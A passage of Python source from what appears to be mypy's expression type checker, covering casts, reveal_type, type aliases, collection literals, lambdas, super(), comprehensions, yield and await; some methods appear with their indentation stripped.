target_type = expr.type
options = self.chk.options
if options.warn_redundant_casts and is_same_type(source_type, target_type):
self.msg.redundant_cast(target_type, expr)
if options.disallow_any_unimported and has_any_from_unimported_type(target_type):
self.msg.unimported_type_becomes_any("Target type of cast", target_type, expr)
check_for_explicit_any(target_type, self.chk.options, self.chk.is_typeshed_stub, self.msg,
context=expr)
return target_type
    def visit_reveal_expr(self, expr: RevealExpr) -> Type:
        """Type check a reveal_type() or reveal_locals() expression."""
        if expr.kind == REVEAL_TYPE:
            assert expr.expr is not None
            revealed_type = self.accept(expr.expr, type_context=self.type_context[-1])
            if not self.chk.current_node_deferred:
                self.msg.reveal_type(revealed_type, expr)
                if not self.chk.in_checked_function():
                    self.msg.note("'reveal_type' always outputs 'Any' in unchecked functions",
                                  expr)
            return revealed_type
        else:
            # REVEAL_LOCALS
            if not self.chk.current_node_deferred:
                # the RevealExpr contains a local_nodes attribute,
                # calculated at semantic analysis time. Use it to pull out the
                # corresponding subset of variables in self.chk.type_map
                names_to_types = {
                    var_node.name(): var_node.type for var_node in expr.local_nodes
                } if expr.local_nodes is not None else {}
                self.msg.reveal_locals(names_to_types, expr)
            # reveal_locals() itself has no meaningful value.
            return NoneTyp()
    def visit_type_application(self, tapp: TypeApplication) -> Type:
        """Type check a type application (expr[type, ...]).

        There are two different options here, depending on whether expr refers
        to a type alias or directly to a generic class. In the first case we need
        to use a dedicated function typeanal.expand_type_aliases. This
        is due to the fact that currently type aliases machinery uses
        unbound type variables, while normal generics use bound ones;
        see TypeAlias docstring for more details.
        """
        if isinstance(tapp.expr, RefExpr) and isinstance(tapp.expr.node, TypeAlias):
            # Subscription of a (generic) alias in runtime context, expand the alias.
            target = tapp.expr.node.target
            all_vars = tapp.expr.node.alias_tvars
            item = expand_type_alias(target, all_vars, tapp.types, self.chk.fail,
                                     tapp.expr.node.no_args, tapp)
            if isinstance(item, Instance):
                # The expanded alias names a class: type-check as a constructor
                # with the alias's type arguments applied.
                tp = type_object_type(item.type, self.named_type)
                return self.apply_type_arguments_to_callable(tp, item.args, tapp)
            else:
                self.chk.fail(messages.ONLY_CLASS_APPLICATION, tapp)
                return AnyType(TypeOfAny.from_error)
        # Type application of a normal generic class in runtime context.
        # This is typically used as `x = G[int]()`.
        tp = self.accept(tapp.expr)
        if isinstance(tp, (CallableType, Overloaded)):
            if not tp.is_type_obj():
                self.chk.fail(messages.ONLY_CLASS_APPLICATION, tapp)
            return self.apply_type_arguments_to_callable(tp, tapp.types, tapp)
        if isinstance(tp, AnyType):
            return AnyType(TypeOfAny.from_another_any, source_any=tp)
        # Non-callable, non-Any base: an error has been reported elsewhere.
        return AnyType(TypeOfAny.special_form)
def visit_type_alias_expr(self, alias: TypeAliasExpr) -> Type:
"""Right hand side of a type alias definition.
It has the same type as if the alias itself was used in a runtime context.
For example, here:
A = reveal_type(List[T])
reveal_type(A)
both `reveal_type` instances will reveal the same type `def (...) -> builtins.list[Any]`.
Note that type variables are implicitly substituted with `Any`.
"""
return self.alias_type_in_runtime_context(alias.type, alias.tvars, alias.no_args,
alias, alias_definition=True)
    def alias_type_in_runtime_context(self, target: Type, alias_tvars: List[str],
                                      no_args: bool, ctx: Context,
                                      *,
                                      alias_definition: bool = False) -> Type:
        """Get type of a type alias (could be generic) in a runtime expression.

        Note that this function can be called only if the alias appears _not_
        as a target of type application, which is treated separately in the
        visit_type_application method. Some examples where this method is called are
        casts and instantiation:

            class LongName(Generic[T]): ...
            A = LongName[int]
            x = A()
            y = cast(A, ...)
        """
        if isinstance(target, Instance) and target.invalid:
            # An invalid alias, error already has been reported
            return AnyType(TypeOfAny.from_error)
        # If this is a generic alias, we set all variables to `Any`.
        # For example:
        #     A = List[Tuple[T, T]]
        #     x = A() <- same as List[Tuple[Any, Any]], see PEP 484.
        item = set_any_tvars(target, alias_tvars, ctx.line, ctx.column)
        if isinstance(item, Instance):
            # Normally we get a callable type (or overloaded) with .is_type_obj() true
            # representing the class's constructor
            tp = type_object_type(item.type, self.named_type)
            if no_args:
                return tp
            return self.apply_type_arguments_to_callable(tp, item.args, ctx)
        elif (isinstance(item, TupleType) and
              # Tuple[str, int]() fails at runtime, only named tuples and subclasses work.
              item.fallback.type.fullname() != 'builtins.tuple'):
            return type_object_type(item.fallback.type, self.named_type)
        elif isinstance(item, AnyType):
            return AnyType(TypeOfAny.from_another_any, source_any=item)
        else:
            if alias_definition:
                # The RHS of the alias definition itself is fine.
                return AnyType(TypeOfAny.special_form)
            # This type is invalid in most runtime contexts.
            self.msg.alias_invalid_in_runtime_context(item, ctx)
            return AnyType(TypeOfAny.from_error)
def apply_type_arguments_to_callable(self, tp: Type, args: List[Type], ctx: Context) -> Type:
"""Apply type arguments to a generic callable type coming from a type object.
This will first perform type arguments count checks, report the
error as needed, and return the correct kind of Any. As a special
case this returns Any for non-callable types, because if type object type
is not callable, then an error should be already reported.
"""
if isinstance(tp, CallableType):
if len(tp.variables) != len(args):
self.msg.incompatible_type_application(len(tp.variables),
len(args), ctx)
return AnyType(TypeOfAny.from_error)
return self.apply_generic_arguments(tp, args, ctx)
if isinstance(tp, Overloaded):
for it in tp.items():
if len(it.variables) != len(args):
self.msg.incompatible_type_application(len(it.variables),
len(args), ctx)
return AnyType(TypeOfAny.from_error)
return Overloaded([self.apply_generic_arguments(it, args, ctx)
for it in tp.items()])
return AnyType(TypeOfAny.special_form)
    def visit_list_expr(self, e: ListExpr) -> Type:
        """Type check a list expression [...].

        Delegates to the shared list/set/tuple item inference.
        """
        return self.check_lst_expr(e.items, 'builtins.list', '<list>', e)
    def visit_set_expr(self, e: SetExpr) -> Type:
        """Type check a set expression {...} via the shared item inference."""
        return self.check_lst_expr(e.items, 'builtins.set', '<set>', e)
    def check_lst_expr(self, items: List[Expression], fullname: str,
                       tag: str, context: Context) -> Type:
        """Type check a list/set/tuple literal by faking a generic call.

        The synthetic callable has signature 'def [T] (*v: T) -> C[T]', so the
        ordinary call checker infers the item type T from the literal items.
        """
        # Translate into type checking a generic function call.
        # Used for list and set expressions, as well as for tuples
        # containing star expressions that don't refer to a
        # Tuple. (Note: "lst" stands for list-set-tuple. :-)
        tvdef = TypeVarDef('T', 'T', -1, [], self.object_type())
        tv = TypeVarType(tvdef)
        constructor = CallableType(
            [tv],
            [nodes.ARG_STAR],
            [None],
            self.chk.named_generic_type(fullname, [tv]),
            self.named_type('builtins.function'),
            name=tag,
            variables=[tvdef])
        # Star items are unpacked into the *v parameter, everything else is
        # passed positionally.
        return self.check_call(constructor,
                               [(i.expr if isinstance(i, StarExpr) else i)
                                for i in items],
                               [(nodes.ARG_STAR if isinstance(i, StarExpr) else nodes.ARG_POS)
                                for i in items],
                               context)[0]
    def visit_tuple_expr(self, e: TupleExpr) -> Type:
        """Type check a tuple expression."""
        # Try to determine type context for type inference.
        type_context = self.type_context[-1]
        type_context_items = None
        if isinstance(type_context, UnionType):
            tuples_in_context = [t for t in type_context.items
                                 if (isinstance(t, TupleType) and len(t.items) == len(e.items)) or
                                 is_named_instance(t, 'builtins.tuple')]
            if len(tuples_in_context) == 1:
                type_context = tuples_in_context[0]
            else:
                # There are either no relevant tuples in the Union, or there is
                # more than one.  Either way, we can't decide on a context.
                pass
        if isinstance(type_context, TupleType):
            type_context_items = type_context.items
        elif type_context and is_named_instance(type_context, 'builtins.tuple'):
            assert isinstance(type_context, Instance)
            if type_context.args:
                # Homogeneous tuple context: reuse the element type for every
                # position.
                type_context_items = [type_context.args[0]] * len(e.items)
        # NOTE: it's possible for the context to have a different
        # number of items than e.  In that case we use those context
        # items that match a position in e, and we'll worry about type
        # mismatches later.
        # Infer item types.  Give up if there's a star expression
        # that's not a Tuple.
        items = []  # type: List[Type]
        j = 0  # Index into type_context_items; irrelevant if type_context_items is none
        for i in range(len(e.items)):
            item = e.items[i]
            if isinstance(item, StarExpr):
                # Special handling for star expressions.
                # TODO: If there's a context, and item.expr is a
                # TupleExpr, flatten it, so we can benefit from the
                # context?  Counterargument: Why would anyone write
                # (1, *(2, 3)) instead of (1, 2, 3) except in a test?
                tt = self.accept(item.expr)
                if isinstance(tt, TupleType):
                    items.extend(tt.items)
                    j += len(tt.items)
                else:
                    # A star expression that's not a Tuple.
                    # Treat the whole thing as a variable-length tuple.
                    return self.check_lst_expr(e.items, 'builtins.tuple', '<tuple>', e)
            else:
                if not type_context_items or j >= len(type_context_items):
                    tt = self.accept(item)
                else:
                    tt = self.accept(item, type_context_items[j])
                j += 1
                items.append(tt)
        # The fallback 'tuple[X]' element type is the join of all item types.
        fallback_item = join.join_type_list(items)
        return TupleType(items, self.chk.named_generic_type('builtins.tuple', [fallback_item]))
    def visit_dict_expr(self, e: DictExpr) -> Type:
        """Type check a dict expression.

        Translate it into a call to dict(), with provisions for **expr.
        """
        # if the dict literal doesn't match TypedDict, check_typeddict_call_with_dict reports
        # an error, but returns the TypedDict type that matches the literal it found
        # that would cause a second error when that TypedDict type is returned upstream
        # to avoid the second error, we always return TypedDict type that was requested
        typeddict_context = self.find_typeddict_context(self.type_context[-1])
        if typeddict_context:
            self.check_typeddict_call_with_dict(
                callee=typeddict_context,
                kwargs=e,
                context=e
            )
            return typeddict_context.copy_modified()
        # Collect function arguments, watching out for **expr.
        args = []  # type: List[Expression]  # Regular "key: value"
        stargs = []  # type: List[Expression]  # For "**expr"
        for key, value in e.items:
            if key is None:
                stargs.append(value)
            else:
                args.append(TupleExpr([key, value]))
        # Define type variables (used in constructors below).
        ktdef = TypeVarDef('KT', 'KT', -1, [], self.object_type())
        vtdef = TypeVarDef('VT', 'VT', -2, [], self.object_type())
        kt = TypeVarType(ktdef)
        vt = TypeVarType(vtdef)
        rv = None
        # Call dict(*args), unless it's empty and stargs is not.
        if args or not stargs:
            # The callable type represents a function like this:
            #
            #   def <unnamed>(*v: Tuple[kt, vt]) -> Dict[kt, vt]: ...
            constructor = CallableType(
                [TupleType([kt, vt], self.named_type('builtins.tuple'))],
                [nodes.ARG_STAR],
                [None],
                self.chk.named_generic_type('builtins.dict', [kt, vt]),
                self.named_type('builtins.function'),
                name='<dict>',
                variables=[ktdef, vtdef])
            rv = self.check_call(constructor, args, [nodes.ARG_POS] * len(args), e)[0]
        else:
            # dict(...) will be called below.
            pass
        # Call rv.update(arg) for each arg in **stargs,
        # except if rv isn't set yet, then set rv = dict(arg).
        if stargs:
            for arg in stargs:
                if rv is None:
                    # First ** argument with no preceding items: model it as
                    # dict(mapping) so kt/vt are inferred from the mapping.
                    constructor = CallableType(
                        [self.chk.named_generic_type('typing.Mapping', [kt, vt])],
                        [nodes.ARG_POS],
                        [None],
                        self.chk.named_generic_type('builtins.dict', [kt, vt]),
                        self.named_type('builtins.function'),
                        name='<list>',
                        variables=[ktdef, vtdef])
                    rv = self.check_call(constructor, [arg], [nodes.ARG_POS], arg)[0]
                else:
                    self.check_method_call_by_name('update', rv, [arg], [nodes.ARG_POS], arg)
        assert rv is not None
        return rv
def find_typeddict_context(self, context: Optional[Type]) -> Optional[TypedDictType]:
if isinstance(context, TypedDictType):
return context
elif isinstance(context, UnionType):
items = []
for item in context.items:
item_context = self.find_typeddict_context(item)
if item_context:
items.append(item_context)
if len(items) == 1:
# Only one union item is TypedDict, so use the context as it's unambiguous.
return items[0]
# No TypedDict type in context.
return None
    def visit_lambda_expr(self, e: LambdaExpr) -> Type:
        """Type check lambda expression."""
        inferred_type, type_override = self.infer_lambda_type_using_context(e)
        if not inferred_type:
            self.chk.return_types.append(AnyType(TypeOfAny.special_form))
            # No useful type context.
            ret_type = self.accept(e.expr(), allow_none_return=True)
            fallback = self.named_type('builtins.function')
            self.chk.return_types.pop()
            return callable_type(e, fallback, ret_type)
        else:
            # Type context available.
            self.chk.return_types.append(inferred_type.ret_type)
            self.chk.check_func_item(e, type_override=type_override)
            if e.expr() not in self.chk.type_map:
                # check_func_item did not record a type for the body;
                # type check it directly.
                self.accept(e.expr(), allow_none_return=True)
            ret_type = self.chk.type_map[e.expr()]
            if isinstance(ret_type, NoneTyp):
                # For "lambda ...: None", just use type from the context.
                # Important when the context is Callable[..., None] which
                # really means Void. See #1425.
                self.chk.return_types.pop()
                return inferred_type
            self.chk.return_types.pop()
            return replace_callable_return_type(inferred_type, ret_type)
    def infer_lambda_type_using_context(self, e: LambdaExpr) -> Tuple[Optional[CallableType],
                                                                      Optional[CallableType]]:
        """Try to infer lambda expression type using context.

        Return None if could not infer type.
        The second item in the return type is the type_override parameter for check_func_item.
        """
        # TODO also accept 'Any' context
        ctx = self.type_context[-1]
        if isinstance(ctx, UnionType):
            # A union context only helps when exactly one member is callable.
            callables = [t for t in ctx.relevant_items() if isinstance(t, CallableType)]
            if len(callables) == 1:
                ctx = callables[0]
        if not ctx or not isinstance(ctx, CallableType):
            return None, None
        # The context may have function type variables in it. We replace them
        # since these are the type variables we are ultimately trying to infer;
        # they must be considered as indeterminate. We use ErasedType since it
        # does not affect type inference results (it is for purposes like this
        # only).
        callable_ctx = replace_meta_vars(ctx, ErasedType())
        assert isinstance(callable_ctx, CallableType)
        arg_kinds = [arg.kind for arg in e.arguments]
        if callable_ctx.is_ellipsis_args:
            # Fill in Any arguments to match the arguments of the lambda.
            callable_ctx = callable_ctx.copy_modified(
                is_ellipsis_args=False,
                arg_types=[AnyType(TypeOfAny.special_form)] * len(arg_kinds),
                arg_kinds=arg_kinds,
                arg_names=[None] * len(arg_kinds)
            )
        if ARG_STAR in arg_kinds or ARG_STAR2 in arg_kinds:
            # TODO treat this case appropriately
            return callable_ctx, None
        if callable_ctx.arg_kinds != arg_kinds:
            # Incompatible context; cannot use it to infer types.
            self.chk.fail(messages.CANNOT_INFER_LAMBDA_TYPE, e)
            return None, None
        return callable_ctx, callable_ctx
def visit_super_expr(self, e: SuperExpr) -> Type:
"""Type check a super expression (non-lvalue)."""
self.check_super_arguments(e)
t = self.analyze_super(e, False)
return t
    def check_super_arguments(self, e: SuperExpr) -> None:
        """Check arguments in a super(...) call.

        Only zero-argument (Python 3) and two-argument positional forms are
        supported; errors are reported for everything else. For the
        two-argument form, verify that argument 2 is an instance (or subtype)
        of argument 1.
        """
        if ARG_STAR in e.call.arg_kinds:
            self.chk.fail('Varargs not supported with "super"', e)
        elif e.call.args and set(e.call.arg_kinds) != {ARG_POS}:
            self.chk.fail('"super" only accepts positional arguments', e)
        elif len(e.call.args) == 1:
            self.chk.fail('"super" with a single argument not supported', e)
        elif len(e.call.args) > 2:
            self.chk.fail('Too many arguments for "super"', e)
        elif self.chk.options.python_version[0] == 2 and len(e.call.args) == 0:
            # Zero-argument super() only exists on Python 3.
            self.chk.fail('Too few arguments for "super"', e)
        elif len(e.call.args) == 2:
            type_obj_type = self.accept(e.call.args[0])
            instance_type = self.accept(e.call.args[1])
            # Determine the TypeInfo named by the first argument.
            if isinstance(type_obj_type, FunctionLike) and type_obj_type.is_type_obj():
                type_info = type_obj_type.type_object()
            elif isinstance(type_obj_type, TypeType):
                item = type_obj_type.item
                if isinstance(item, AnyType):
                    # Could be anything.
                    return
                if isinstance(item, TupleType):
                    item = item.fallback  # Handle named tuples and other Tuple[...] subclasses.
                if not isinstance(item, Instance):
                    # A complicated type object type. Too tricky, give up.
                    # TODO: Do something more clever here.
                    self.chk.fail('Unsupported argument 1 for "super"', e)
                    return
                type_info = item.type
            elif isinstance(type_obj_type, AnyType):
                return
            else:
                self.msg.first_argument_for_super_must_be_type(type_obj_type, e)
                return
            # Check that the second argument is an instance of the first.
            if isinstance(instance_type, (Instance, TupleType, TypeVarType)):
                if isinstance(instance_type, TypeVarType):
                    # Needed for generic self.
                    instance_type = instance_type.upper_bound
                    if not isinstance(instance_type, (Instance, TupleType)):
                        # Too tricky, give up.
                        # TODO: Do something more clever here.
                        self.chk.fail(messages.UNSUPPORTED_ARGUMENT_2_FOR_SUPER, e)
                        return
                if isinstance(instance_type, TupleType):
                    # Needed for named tuples and other Tuple[...] subclasses.
                    instance_type = instance_type.fallback
                if type_info not in instance_type.type.mro:
                    self.chk.fail('Argument 2 for "super" not an instance of argument 1', e)
            elif isinstance(instance_type, TypeType) or (isinstance(instance_type, FunctionLike)
                                                         and instance_type.is_type_obj()):
                # TODO: Check whether this is a valid type object here.
                pass
            elif not isinstance(instance_type, AnyType):
                self.chk.fail(messages.UNSUPPORTED_ARGUMENT_2_FOR_SUPER, e)
    def analyze_super(self, e: SuperExpr, is_lvalue: bool) -> Type:
        """Type check a super expression.

        Walk the MRO of the enclosing class (skipping the class itself) and
        resolve the accessed member against the first base that defines it.
        """
        if e.info and e.info.bases:
            # TODO fix multiple inheritance etc
            if len(e.info.mro) < 2:
                self.chk.fail('Internal error: unexpected mro for {}: {}'.format(
                    e.info.name(), e.info.mro), e)
                return AnyType(TypeOfAny.from_error)
            for base in e.info.mro[1:]:
                if e.name in base.names or base == e.info.mro[-1]:
                    if e.info.fallback_to_any and base == e.info.mro[-1]:
                        # There's an undefined base class, and we're
                        # at the end of the chain.  That's not an error.
                        return AnyType(TypeOfAny.special_form)
                    if not self.chk.in_checked_function():
                        return AnyType(TypeOfAny.unannotated)
                    if self.chk.scope.active_class() is not None:
                        # The innermost scope is a class body, not a method,
                        # per the error message below.
                        self.chk.fail('super() outside of a method is not supported', e)
                        return AnyType(TypeOfAny.from_error)
                    method = self.chk.scope.top_function()
                    assert method is not None
                    args = method.arguments
                    # super() in a function with empty args is an error; we
                    # need something in declared_self.
                    if not args:
                        self.chk.fail(
                            'super() requires one or more positional arguments in '
                            'enclosing function', e)
                        return AnyType(TypeOfAny.from_error)
                    declared_self = args[0].variable.type or fill_typevars(e.info)
                    return analyze_member_access(name=e.name, typ=fill_typevars(e.info), node=e,
                                                 is_lvalue=False, is_super=True, is_operator=False,
                                                 builtin_type=self.named_type,
                                                 not_ready_callback=self.not_ready_callback,
                                                 msg=self.msg, override_info=base,
                                                 original_type=declared_self, chk=self.chk)
            # The loop always returns: the last MRO entry matches
            # 'base == e.info.mro[-1]'.
            assert False, 'unreachable'
        else:
            # Invalid super. This has been reported by the semantic analyzer.
            return AnyType(TypeOfAny.from_error)
def visit_slice_expr(self, e: SliceExpr) -> Type:
expected = make_optional_type(self.named_type('builtins.int'))
for index in [e.begin_index, e.end_index, e.stride]:
if index:
t = self.accept(index)
self.chk.check_subtype(t, expected,
index, messages.INVALID_SLICE_INDEX)
return self.named_type('builtins.slice')
    def visit_list_comprehension(self, e: ListComprehension) -> Type:
        """Type check a list comprehension; result is 'builtins.list[T]'."""
        return self.check_generator_or_comprehension(
            e.generator, 'builtins.list', '<list-comprehension>')
    def visit_set_comprehension(self, e: SetComprehension) -> Type:
        """Type check a set comprehension; result is 'builtins.set[T]'."""
        return self.check_generator_or_comprehension(
            e.generator, 'builtins.set', '<set-comprehension>')
def visit_generator_expr(self, e: GeneratorExpr) -> Type:
# If any of the comprehensions use async for, the expression will return an async generator
# object
if any(e.is_async):
typ = 'typing.AsyncGenerator'
# received type is always None in async generator expressions
additional_args = [NoneTyp()] # type: List[Type]
else:
typ = 'typing.Generator'
# received type and returned type are None
additional_args = [NoneTyp(), NoneTyp()]
return self.check_generator_or_comprehension(e, typ, '<generator>',
additional_args=additional_args)
def check_generator_or_comprehension(self, gen: GeneratorExpr,
type_name: str,
id_for_messages: str,
additional_args: List[Type] = []) -> Type:
"""Type check a generator expression or a list comprehension."""
with self.chk.binder.frame_context(can_skip=True, fall_through=0):
self.check_for_comp(gen)
# Infer the type of the list comprehension by using a synthetic generic
# callable type.
tvdef = TypeVarDef('T', 'T', -1, [], self.object_type())
tv_list = [TypeVarType(tvdef)] # type: List[Type]
constructor = CallableType(
tv_list,
[nodes.ARG_POS],
[None],
self.chk.named_generic_type(type_name, tv_list + additional_args),
self.chk.named_type('builtins.function'),
name=id_for_messages,
variables=[tvdef])
return self.check_call(constructor,
[gen.left_expr], [nodes.ARG_POS], gen)[0]
    def visit_dictionary_comprehension(self, e: DictionaryComprehension) -> Type:
        """Type check a dictionary comprehension."""
        with self.chk.binder.frame_context(can_skip=True, fall_through=0):
            self.check_for_comp(e)
            # Infer the type of the list comprehension by using a synthetic generic
            # callable type. Its signature is 'def [KT, VT] (KT, VT) -> Dict[KT, VT]',
            # so calling it with the key and value expressions infers KT and VT.
            ktdef = TypeVarDef('KT', 'KT', -1, [], self.object_type())
            vtdef = TypeVarDef('VT', 'VT', -2, [], self.object_type())
            kt = TypeVarType(ktdef)
            vt = TypeVarType(vtdef)
            constructor = CallableType(
                [kt, vt],
                [nodes.ARG_POS, nodes.ARG_POS],
                [None, None],
                self.chk.named_generic_type('builtins.dict', [kt, vt]),
                self.chk.named_type('builtins.function'),
                name='<dictionary-comprehension>',
                variables=[ktdef, vtdef])
            return self.check_call(constructor,
                                   [e.key, e.value], [nodes.ARG_POS, nodes.ARG_POS], e)[0]
    def check_for_comp(self, e: Union[GeneratorExpr, DictionaryComprehension]) -> None:
        """Check the for_comp part of comprehensions. That is the part from 'for':
        ... for x in y if z

        Note: This adds the type information derived from the condlists to the current binder.
        """
        # Each clause has its own index target, iterable, condition list and
        # async flag; process them left to right, as Python evaluates them.
        for index, sequence, conditions, is_async in zip(e.indices, e.sequences,
                                                         e.condlists, e.is_async):
            if is_async:
                _, sequence_type = self.chk.analyze_async_iterable_item_type(sequence)
            else:
                _, sequence_type = self.chk.analyze_iterable_item_type(sequence)
            self.chk.analyze_index_variables(index, sequence_type, True, e)
            for condition in conditions:
                self.accept(condition)

                # values are only part of the comprehension when all conditions are true
                true_map, _ = self.chk.find_isinstance_check(condition)
                if true_map:
                    # Narrow the types of variables mentioned in the condition.
                    for var, type in true_map.items():
                        self.chk.binder.put(var, type)
    def visit_conditional_expr(self, e: ConditionalExpr) -> Type:
        """Type check a conditional expression 'a if cond else b'."""
        self.accept(e.cond)
        ctx = self.type_context[-1]

        # Gain type information from isinstance if it is there
        # but only for the current expression
        if_map, else_map = self.chk.find_isinstance_check(e.cond)

        if_type = self.analyze_cond_branch(if_map, e.if_expr, context=ctx)

        if not mypy.checker.is_valid_inferred_type(if_type):
            # Analyze the right branch disregarding the left branch.
            else_type = self.analyze_cond_branch(else_map, e.else_expr, context=ctx)

            # If it would make a difference, re-analyze the left
            # branch using the right branch's type as context.
            if ctx is None or not is_equivalent(else_type, ctx):
                # TODO: If it's possible that the previous analysis of
                # the left branch produced errors that are avoided
                # using this context, suppress those errors.
                if_type = self.analyze_cond_branch(if_map, e.if_expr, context=else_type)

        else:
            # Analyze the right branch in the context of the left
            # branch's type.
            else_type = self.analyze_cond_branch(else_map, e.else_expr, context=if_type)

        # Only create a union type if the type context is a union, to be mostly
        # compatible with older mypy versions where we always did a join.
        #
        # TODO: Always create a union or at least in more cases?
        if isinstance(self.type_context[-1], UnionType):
            res = UnionType.make_simplified_union([if_type, else_type])
        else:
            res = join.join_types(if_type, else_type)

        return res
    def analyze_cond_branch(self, map: Optional[Dict[Expression, Type]],
                            node: Expression, context: Optional[Type]) -> Type:
        """Type check one branch of a conditional expression.

        *map* holds the isinstance-derived narrowing for the branch; a None
        map means the branch is unreachable, in which case the node is still
        checked (for errors) but the result type is uninhabited.
        """
        with self.chk.binder.frame_context(can_skip=True, fall_through=0):
            if map is None:
                # We still need to type check node, in case we want to
                # process it for isinstance checks later
                self.accept(node, type_context=context)
                return UninhabitedType()
            self.chk.push_type_map(map)
            return self.accept(node, type_context=context)
    def visit_backquote_expr(self, e: BackquoteExpr) -> Type:
        """Type check a Python 2 backquote (`x`) expression; its value is a str."""
        self.accept(e.expr)  # check the operand for errors; its type is unused
        return self.named_type('builtins.str')
    #
    # Helpers
    #

    def accept(self,
               node: Expression,
               type_context: Optional[Type] = None,
               allow_none_return: bool = False,
               always_allow_any: bool = False,
               ) -> Type:
        """Type check a node in the given type context. If allow_none_return
        is True and this expression is a call, allow it to return None. This
        applies only to this expression and not any subexpressions.

        type_context: the expected type of the expression, if known
        always_allow_any: suppress the --disallow-any-expr error for this node
        """
        if node in self.type_overrides:
            # An explicit per-node override (e.g. from lambda inference) wins.
            return self.type_overrides[node]
        self.type_context.append(type_context)
        try:
            if allow_none_return and isinstance(node, CallExpr):
                typ = self.visit_call_expr(node, allow_none_return=True)
            elif allow_none_return and isinstance(node, YieldFromExpr):
                typ = self.visit_yield_from_expr(node, allow_none_return=True)
            else:
                typ = node.accept(self)
        except Exception as err:
            # report_internal_error does not return normally, so 'typ' is
            # always bound when the assert below runs.
            report_internal_error(err, self.chk.errors.file,
                                  node.line, self.chk.errors, self.chk.options)
        self.type_context.pop()
        assert typ is not None
        self.chk.store_type(node, typ)

        if (self.chk.options.disallow_any_expr and
                not always_allow_any and
                not self.chk.is_stub and
                self.chk.in_checked_function() and
                has_any_type(typ)):
            self.msg.disallowed_any_type(typ, node)

        if not self.chk.in_checked_function():
            # Inside unchecked functions every expression is implicitly Any.
            return AnyType(TypeOfAny.unannotated)
        else:
            return typ
    def named_type(self, name: str) -> Instance:
        """Return an instance type with type given by the name and no type
        arguments. Alias for TypeChecker.named_type.
        """
        return self.chk.named_type(name)
def is_valid_var_arg(self, typ: Type) -> bool:
"""Is a type valid as a *args argument?"""
return (isinstance(typ, TupleType) or
is_subtype(typ, self.chk.named_generic_type('typing.Iterable',
[AnyType(TypeOfAny.special_form)])) or
isinstance(typ, AnyType))
def is_valid_keyword_var_arg(self, typ: Type) -> bool:
"""Is a type valid as a **kwargs argument?"""
if self.chk.options.python_version[0] >= 3:
return is_subtype(typ, self.chk.named_generic_type(
'typing.Mapping', [self.named_type('builtins.str'),
AnyType(TypeOfAny.special_form)]))
else:
return (
is_subtype(typ, self.chk.named_generic_type(
'typing.Mapping',
[self.named_type('builtins.str'),
AnyType(TypeOfAny.special_form)]))
or
is_subtype(typ, self.chk.named_generic_type(
'typing.Mapping',
[self.named_type('builtins.unicode'),
AnyType(TypeOfAny.special_form)])))
    def has_member(self, typ: Type, member: str) -> bool:
        """Does type have member with the given name?"""
        # TODO: refactor this to use checkmember.analyze_member_access, otherwise
        # these two should be carefully kept in sync.
        # Normalize wrappers down to the type that actually carries members.
        if isinstance(typ, TypeVarType):
            typ = typ.upper_bound
        if isinstance(typ, TupleType):
            typ = typ.fallback
        if isinstance(typ, Instance):
            return typ.type.has_readable_member(member)
        if isinstance(typ, CallableType) and typ.is_type_obj():
            # Class objects expose the members of their metaclass fallback.
            return typ.fallback.type.has_readable_member(member)
        elif isinstance(typ, AnyType):
            return True
        elif isinstance(typ, UnionType):
            # A union has a member only if every relevant item does.
            result = all(self.has_member(x, member) for x in typ.relevant_items())
            return result
        elif isinstance(typ, TypeType):
            # Type[Union[X, ...]] is always normalized to Union[Type[X], ...],
            # so we don't need to care about unions here.
            item = typ.item
            if isinstance(item, TypeVarType):
                item = item.upper_bound
            if isinstance(item, TupleType):
                item = item.fallback
            if isinstance(item, Instance) and item.type.metaclass_type is not None:
                return self.has_member(item.type.metaclass_type, member)
            if isinstance(item, AnyType):
                return True
            return False
        else:
            return False
    def not_ready_callback(self, name: str, context: Context) -> None:
        """Called when we can't infer the type of a variable because it's not ready yet.

        Either defer type checking of the enclosing function to the next
        pass or report an error.
        """
        self.chk.handle_cannot_determine_type(name, context)
    def visit_yield_expr(self, e: YieldExpr) -> Type:
        """Type check a yield expression inside a generator function.

        The yielded value must match the generator's declared yield type;
        the expression itself evaluates to the generator's receive type.
        """
        return_type = self.chk.return_types[-1]
        expected_item_type = self.chk.get_generator_yield_type(return_type, False)
        if e.expr is None:
            # Bare 'yield' is only OK when the yield type allows None.
            if (not isinstance(expected_item_type, (NoneTyp, AnyType))
                    and self.chk.in_checked_function()):
                self.chk.fail(messages.YIELD_VALUE_EXPECTED, e)
        else:
            actual_item_type = self.accept(e.expr, expected_item_type)
            self.chk.check_subtype(actual_item_type, expected_item_type, e,
                                   messages.INCOMPATIBLE_TYPES_IN_YIELD,
                                   'actual type', 'expected type')
        return self.chk.get_generator_receive_type(return_type, False)
    def visit_await_expr(self, e: AwaitExpr) -> Type:
        """Type check an 'await' expression; its value is what the awaitable resolves to."""
        expected_type = self.type_context[-1]
        if expected_type is not None:
            # If the context expects T, the operand should be Awaitable[T].
            expected_type = self.chk.named_generic_type('typing.Awaitable', [expected_type])
        actual_type = self.accept(e.expr, expected_type)
        if isinstance(actual_type, AnyType):
            return AnyType(TypeOfAny.from_another_any, source_any=actual_type)
        return self.check_awaitable_expr(actual_type, e, messages.INCOMPATIBLE_TYPES_IN_AWAIT)
    def check_awaitable_expr(self, t: Type, ctx: Context, msg: str) -> Type:
        """Check the argument to `await` and extract the type of value.

        Also used by `async for` and `async with`.

        Returns the type produced by awaiting a value of type *t*, or Any
        if *t* is not awaitable (after reporting the error in *msg*).
        """
        if not self.chk.check_subtype(t, self.named_type('typing.Awaitable'), ctx,
                                      msg, 'actual type', 'expected type'):
            return AnyType(TypeOfAny.special_form)
        else:
            # The await result is the return type of the __await__ generator.
            generator = self.check_method_call_by_name('__await__', t, [], [], ctx)[0]
            return self.chk.get_generator_return_type(generator, False)
    def visit_yield_from_expr(self, e: YieldFromExpr, allow_none_return: bool = False) -> Type:
        """Type check a 'yield from' expression.

        Checks that the operand is an iterable (or a compatible coroutine),
        that its item type matches the enclosing generator's yield type, and
        computes the value the expression itself evaluates to.
        """
        # NOTE: Whether `yield from` accepts an `async def` decorated
        # with `@types.coroutine` (or `@asyncio.coroutine`) depends on
        # whether the generator containing the `yield from` is itself
        # thus decorated. But it accepts a generator regardless of
        # how it's decorated.
        return_type = self.chk.return_types[-1]
        # TODO: What should the context for the sub-expression be?
        # If the containing function has type Generator[X, Y, ...],
        # the context should be Generator[X, Y, T], where T is the
        # context of the 'yield from' itself (but it isn't known).
        subexpr_type = self.accept(e.expr)

        # Check that the expr is an instance of Iterable and get the type of the iterator produced
        # by __iter__.
